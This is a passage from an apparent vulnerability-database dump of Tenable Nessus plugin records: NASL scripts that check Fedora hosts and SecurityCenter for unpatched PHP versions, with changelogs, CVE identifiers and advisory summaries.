\"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_xref(name:\"FEDORA\", value:\"2015-8281\");\n\n script_name(english:\"Fedora 22 : php-5.6.9-1.fc22 (2015-8281)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"14 May 2015, **PHP 5.6.9**\n\nCore :\n\n - Fixed bug #69467 (Wrong checked for the interface by\n using Trait). (Laruence)\n\n - Fixed bug #69420 (Invalid read in\n zend_std_get_method). (Laruence)\n\n - Fixed bug #60022 ('use statement [...] has no effect'\n depends on leading backslash). (Nikita)\n\n - Fixed bug #67314 (Segmentation fault in\n gc_remove_zval_from_buffer). (Dmitry)\n\n - Fixed bug #68652 (segmentation fault in destructor).\n (Dmitry)\n\n - Fixed bug #69419 (Returning compatible sub generator\n produces a warning). (Nikita)\n\n - Fixed bug #69472 (php_sys_readlink ignores misc errors\n from GetFinalPathNameByHandleA). (Jan Starke)\n\n - Fixed bug #69364 (PHP Multipart/form-data remote dos\n Vulnerability). (Stas)\n\n - Fixed bug #69403 (str_repeat() sign mismatch based\n memory corruption). (Stas)\n\n - Fixed bug #69418 (CVE-2006-7243 fix regressions in\n 5.4+). (Stas)\n\n - Fixed bug #69522 (heap buffer overflow in unpack()).\n (Stas)\n\nFTP :\n\n - Fixed bug #69545 (Integer overflow in ftp_genlist()\n resulting in heap overflow). (Stas)\n\nODBC :\n\n - Fixed bug #69354 (Incorrect use of SQLColAttributes with\n ODBC 3.0). (Anatol)\n\n - Fixed bug #69474 (ODBC: Query with same field name\n from two tables returns incorrect result). (Anatol)\n\n - Fixed bug #69381 (out of memory with sage odbc\n driver). (Frederic Marchall, Anatol Belski)\n\nOpenSSL :\n\n - Fixed bug #69402 (Reading empty SSL stream hangs until\n timeout). (Daniel Lowrey)\n\nPCNTL :\n\n - Fixed bug #68598 (pcntl_exec() should not allow null\n char). (Stas)\n\nPCRE :\n\n - Upgraded pcrelib to 8.37.\n\nPhar :\n\n - Fixed bug #69453 (Memory Corruption in\n phar_parse_tarfile when entry filename starts with\n null). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1222485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223425\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/158616.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?fe99a38e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/27\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"php-5.6.9-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:18", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1223425", "https://bugzilla.redhat.com/show_bug.cgi?id=1223408", "https://bugzilla.redhat.com/show_bug.cgi?id=1223412", "https://bugzilla.redhat.com/show_bug.cgi?id=1222485", "http://www.nessus.org/u?bacb1097", "https://bugzilla.redhat.com/show_bug.cgi?id=1223422"], "pluginID": "83895", "description": "14 May 2015, **PHP 5.5.25**\n\n**Core:**\n\n - Fixed bug #69364 (PHP Multipart/form-data remote dos Vulnerability). (Stas)\n\n - Fixed bug #69403 (str_repeat() sign mismatch based memory corruption). (Stas)\n\n - Fixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+). (Stas)\n\n - Fixed bug #69522 (heap buffer overflow in unpack()).\n (Stas)\n\n - Fixed bug #69467 (Wrong checked for the interface by using Trait). (Laruence)\n\n - Fixed bug #69420 (Invalid read in zend_std_get_method). (Laruence)\n\n - Fixed bug #60022 ('use statement [...] has no effect' depends on leading backslash). (Nikita)\n\n - Fixed bug #67314 (Segmentation fault in gc_remove_zval_from_buffer). (Dmitry)\n\n - Fixed bug #68652 (segmentation fault in destructor).\n (Dmitry)\n\n - Fixed bug #69419 (Returning compatible sub generator produces a warning). (Nikita)\n\n - Fixed bug #69472 (php_sys_readlink ignores misc errors from GetFinalPathNameByHandleA). (Jan Starke)\n\n**FTP:**\n\n - Fixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow). (Stas)\n\n**ODBC:**\n\n - Fixed bug #69474 (ODBC: Query with same field name from two tables returns incorrect result). (Anatol)\n\n - Fixed bug #69381 (out of memory with sage odbc driver). (Frederic Marchall, Anatol Belski)\n\n**OpenSSL:**\n\n - Fixed bug #69402 (Reading empty SSL stream hangs until timeout). (Daniel Lowrey)\n\n**PCNTL:**\n\n - Fixed bug #68598 (pcntl_exec() should not allow null char). (Stas)\n\n**Phar:**\n\n - Fixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry filename starts with null). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2015-05-29T00:00:00", "title": "Fedora 20 : php-5.5.25-1.fc20 (2015-8370)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-10-19T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:php", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2015-8370.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83895", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-8370.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83895);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:22:34 $\");\n\n script_cve_id(\"CVE-2006-7243\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_xref(name:\"FEDORA\", value:\"2015-8370\");\n\n script_name(english:\"Fedora 20 : php-5.5.25-1.fc20 (2015-8370)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"14 May 2015, **PHP 5.5.25**\n\n**Core:**\n\n - Fixed bug #69364 (PHP Multipart/form-data remote dos\n Vulnerability). (Stas)\n\n - Fixed bug #69403 (str_repeat() sign mismatch based\n memory corruption). (Stas)\n\n - Fixed bug #69418 (CVE-2006-7243 fix regressions in\n 5.4+). (Stas)\n\n - Fixed bug #69522 (heap buffer overflow in unpack()).\n (Stas)\n\n - Fixed bug #69467 (Wrong checked for the interface by\n using Trait). (Laruence)\n\n - Fixed bug #69420 (Invalid read in\n zend_std_get_method). (Laruence)\n\n - Fixed bug #60022 ('use statement [...] has no effect'\n depends on leading backslash). (Nikita)\n\n - Fixed bug #67314 (Segmentation fault in\n gc_remove_zval_from_buffer). (Dmitry)\n\n - Fixed bug #68652 (segmentation fault in destructor).\n (Dmitry)\n\n - Fixed bug #69419 (Returning compatible sub generator\n produces a warning). (Nikita)\n\n - Fixed bug #69472 (php_sys_readlink ignores misc errors\n from GetFinalPathNameByHandleA). (Jan Starke)\n\n**FTP:**\n\n - Fixed bug #69545 (Integer overflow in ftp_genlist()\n resulting in heap overflow). (Stas)\n\n**ODBC:**\n\n - Fixed bug #69474 (ODBC: Query with same field name from\n two tables returns incorrect result). (Anatol)\n\n - Fixed bug #69381 (out of memory with sage odbc\n driver). (Frederic Marchall, Anatol Belski)\n\n**OpenSSL:**\n\n - Fixed bug #69402 (Reading empty SSL stream hangs until\n timeout). (Daniel Lowrey)\n\n**PCNTL:**\n\n - Fixed bug #68598 (pcntl_exec() should not allow null\n char). (Stas)\n\n**Phar:**\n\n - Fixed bug #69453 (Memory Corruption in\n phar_parse_tarfile when entry filename starts with\n null). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1222485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223425\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/159031.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?bacb1097\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"php-5.5.25-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:24", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1223425", "https://bugzilla.redhat.com/show_bug.cgi?id=1223408", "http://www.nessus.org/u?615db80b", "https://bugzilla.redhat.com/show_bug.cgi?id=1223412", "https://bugzilla.redhat.com/show_bug.cgi?id=1222485", "https://bugzilla.redhat.com/show_bug.cgi?id=1223422"], "pluginID": "83896", "description": "14 May 2015, **PHP 5.6.9**\n\nCore :\n\n - Fixed bug #69467 (Wrong checked for the interface by using Trait). (Laruence)\n\n - Fixed bug #69420 (Invalid read in zend_std_get_method). (Laruence)\n\n - Fixed bug #60022 ('use statement [...] has no effect' depends on leading backslash). (Nikita)\n\n - Fixed bug #67314 (Segmentation fault in gc_remove_zval_from_buffer). (Dmitry)\n\n - Fixed bug #68652 (segmentation fault in destructor).\n (Dmitry)\n\n - Fixed bug #69419 (Returning compatible sub generator produces a warning). (Nikita)\n\n - Fixed bug #69472 (php_sys_readlink ignores misc errors from GetFinalPathNameByHandleA). (Jan Starke)\n\n - Fixed bug #69364 (PHP Multipart/form-data remote dos Vulnerability). (Stas)\n\n - Fixed bug #69403 (str_repeat() sign mismatch based memory corruption). (Stas)\n\n - Fixed bug #69418 (CVE-2006-7243 fix regressions in 5.4+). (Stas)\n\n - Fixed bug #69522 (heap buffer overflow in unpack()).\n (Stas)\n\nFTP :\n\n - Fixed bug #69545 (Integer overflow in ftp_genlist() resulting in heap overflow). (Stas)\n\nODBC :\n\n - Fixed bug #69354 (Incorrect use of SQLColAttributes with ODBC 3.0). (Anatol)\n\n - Fixed bug #69474 (ODBC: Query with same field name from two tables returns incorrect result). (Anatol)\n\n - Fixed bug #69381 (out of memory with sage odbc driver). (Frederic Marchall, Anatol Belski)\n\nOpenSSL :\n\n - Fixed bug #69402 (Reading empty SSL stream hangs until timeout). (Daniel Lowrey)\n\nPCNTL :\n\n - Fixed bug #68598 (pcntl_exec() should not allow null char). (Stas)\n\nPCRE :\n\n - Upgraded pcrelib to 8.37.\n\nPhar :\n\n - Fixed bug #69453 (Memory Corruption in phar_parse_tarfile when entry filename starts with null). (Stas)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2015-05-29T00:00:00", "title": "Fedora 21 : php-5.6.9-1.fc21 (2015-8383)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-4021", "CVE-2015-4026", "CVE-2015-4022"], "modified": "2015-10-19T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:21", "p-cpe:/a:fedoraproject:fedora:php"], "id": "FEDORA_2015-8383.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=83896", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-8383.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83896);\n script_version(\"$Revision: 2.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 23:22:34 $\");\n\n script_cve_id(\"CVE-2006-7243\", \"CVE-2015-4021\", \"CVE-2015-4022\", \"CVE-2015-4024\", \"CVE-2015-4025\", \"CVE-2015-4026\");\n script_xref(name:\"FEDORA\", value:\"2015-8383\");\n\n script_name(english:\"Fedora 21 : php-5.6.9-1.fc21 (2015-8383)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"14 May 2015, **PHP 5.6.9**\n\nCore :\n\n - Fixed bug #69467 (Wrong checked for the interface by\n using Trait). (Laruence)\n\n - Fixed bug #69420 (Invalid read in\n zend_std_get_method). (Laruence)\n\n - Fixed bug #60022 ('use statement [...] has no effect'\n depends on leading backslash). (Nikita)\n\n - Fixed bug #67314 (Segmentation fault in\n gc_remove_zval_from_buffer). (Dmitry)\n\n - Fixed bug #68652 (segmentation fault in destructor).\n (Dmitry)\n\n - Fixed bug #69419 (Returning compatible sub generator\n produces a warning). (Nikita)\n\n - Fixed bug #69472 (php_sys_readlink ignores misc errors\n from GetFinalPathNameByHandleA). (Jan Starke)\n\n - Fixed bug #69364 (PHP Multipart/form-data remote dos\n Vulnerability). (Stas)\n\n - Fixed bug #69403 (str_repeat() sign mismatch based\n memory corruption). (Stas)\n\n - Fixed bug #69418 (CVE-2006-7243 fix regressions in\n 5.4+). (Stas)\n\n - Fixed bug #69522 (heap buffer overflow in unpack()).\n (Stas)\n\nFTP :\n\n - Fixed bug #69545 (Integer overflow in ftp_genlist()\n resulting in heap overflow). (Stas)\n\nODBC :\n\n - Fixed bug #69354 (Incorrect use of SQLColAttributes with\n ODBC 3.0). (Anatol)\n\n - Fixed bug #69474 (ODBC: Query with same field name\n from two tables returns incorrect result). (Anatol)\n\n - Fixed bug #69381 (out of memory with sage odbc\n driver). (Frederic Marchall, Anatol Belski)\n\nOpenSSL :\n\n - Fixed bug #69402 (Reading empty SSL stream hangs until\n timeout). (Daniel Lowrey)\n\nPCNTL :\n\n - Fixed bug #68598 (pcntl_exec() should not allow null\n char). (Stas)\n\nPCRE :\n\n - Upgraded pcrelib to 8.37.\n\nPhar :\n\n - Fixed bug #69453 (Memory Corruption in\n phar_parse_tarfile when entry filename starts with\n null). (Stas)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1222485\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223408\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223412\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223422\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1223425\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-May/158915.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?615db80b\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected php package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:php\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/05/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"php-5.6.9-1.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-11-17T02:56:34", "references": ["https://secure.php.net/ChangeLog-5.php#5.4.41", "https://www.tenable.com/security/tns-2015-06"], "pluginID": "85566", "description": "The SecurityCenter application installed on the remote host is affected by multiple vulnerabilities in the bundled version of PHP that is prior to version 5.4.41. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple flaws exist related to using pathnames containing NULL bytes. A remote attacker can exploit these flaws, by combining the '\\0' character with a safe file extension, to bypass access restrictions. This had been previously fixed but was reintroduced by a regression in versions 5.4+. (CVE-2006-7243, CVE-2015-4025)\n\n - Multiple heap buffer overflow conditions exist in the bundled Perl-Compatible Regular Expression (PCRE) library due to improper validation of user-supplied input to the compile_branch() and pcre_compile2() functions. A remote attacker can exploit these conditions to cause a heap-based buffer overflow, resulting in a denial of service condition or the execution of arbitrary code. (CVE-2015-2325, CVE-2015-2326)\n\n - A flaw exists in the multipart_buffer_headers() function in rfc1867.c due to improper handling of multipart/form-data in HTTP requests. A remote attacker can exploit this flaw to cause a consumption of CPU resources, resulting in a denial of service condition.\n (CVE-2015-4024)", "edition": 11, "reporter": "Tenable", "published": "2015-08-20T00:00:00", "title": "Tenable SecurityCenter Multiple PHP Vulnerabilities (TNS-2015-06)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Misc.", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2325", "CVE-2006-7243", "CVE-2015-4025", "CVE-2015-4024", "CVE-2015-2326"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:tenable:securitycenter"], "id": "SECURITYCENTER_PHP_5_4_41.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=85566", "sourceData": "#TRUSTED a881c11d7c8a42ca4a6316baf04629ab6fdc82b9366ac81fa5f5ad6450c4c227e30e8659a95b5058575f54911fb859704f7632b42e24b0df929ea28e018a5b3ffd2233b802e975febad7e7373e7360f017f7dd565374ffe12d1b70bea930e3ad1f8226953c4d93009d37cfde99a0251123e3dd8526ae0ef252bde8a66f4a1b1f9658114f266b84c16538912d71bd8d7093a1730a6ba23456004b4194f44ca0523f57da8d68cd4531c49c4600ee644c8a397127538b438d681edf0dcaa2c575bd07dab77d9bf9eaa474276217a2de3184c78cb080eef18b26579fd0cdd38b181ede14c8ea8812af624d386285546f7a5fde31dde00db8d822bdd1a2a6a2e0181d1613eeec8079f3d90b1de6657216a9890fd136da2cc1003c5ea96975fbce679ae2093b848db9c260cb82e8e0c3518ad00dde8c90e5c52438e3e7b9d7661f356f44ad7c2a734c740f32f8d6750ac5fef6ccbc745084e450600021c672941f265d5c3f60f18214aa41c2c85bac604a063ee49702d25a1891d977398ec7a9d9ad4fef7e114c64a93144366a7ff4c64750cd47392ca52ea39e81804cbdb14b50168572c81f2d0e2a5bc2b63ef81921d8dfe990e78f487d92d63832db5a9ae07a52197d2b2957422d696fe92dc29330bfa46d6ad2e247a1e4707dd2c9a238b743f9c3f95956f245b1680dd1de2cd2596bc7442a4c45dd07b8d702b9eccdf2dba3aaa1\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(85566);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2018/11/15\");\n\n script_cve_id(\n \"CVE-2006-7243\",\n \"CVE-2015-2325\",\n \"CVE-2015-2326\",\n \"CVE-2015-4024\",\n \"CVE-2015-4025\"\n );\n script_bugtraq_id(\n 44951,\n 74903,\n 74904,\n 75174,\n 75175\n );\n\n script_name(english:\"Tenable SecurityCenter Multiple PHP Vulnerabilities (TNS-2015-06)\");\n script_summary(english:\"Checks the version of PHP in SecurityCenter.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote application is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The SecurityCenter application installed on the remote host is\naffected by multiple vulnerabilities in the bundled version of PHP\nthat is prior to version 5.4.41. It is, therefore, affected by the\nfollowing vulnerabilities :\n\n - Multiple flaws exist related to using pathnames\n containing NULL bytes. A remote attacker can exploit\n these flaws, by combining the '\\0' character with a safe\n file extension, to bypass access restrictions. This had\n been previously fixed but was reintroduced by a\n regression in versions 5.4+. (CVE-2006-7243,\n CVE-2015-4025)\n\n - Multiple heap buffer overflow conditions exist in the\n bundled Perl-Compatible Regular Expression (PCRE)\n library due to improper validation of user-supplied\n input to the compile_branch() and pcre_compile2()\n functions. A remote attacker can exploit these\n conditions to cause a heap-based buffer overflow,\n resulting in a denial of service condition or the\n execution of arbitrary code. (CVE-2015-2325,\n CVE-2015-2326)\n\n - A flaw exists in the multipart_buffer_headers() function\n in rfc1867.c due to improper handling of\n multipart/form-data in HTTP requests. A remote attacker\n can exploit this flaw to cause a consumption of CPU\n resources, resulting in a denial of service condition.\n (CVE-2015-4024)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.tenable.com/security/tns-2015-06\");\n script_set_attribute(attribute:\"see_also\", value:\"https://secure.php.net/ChangeLog-5.php#5.4.41\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 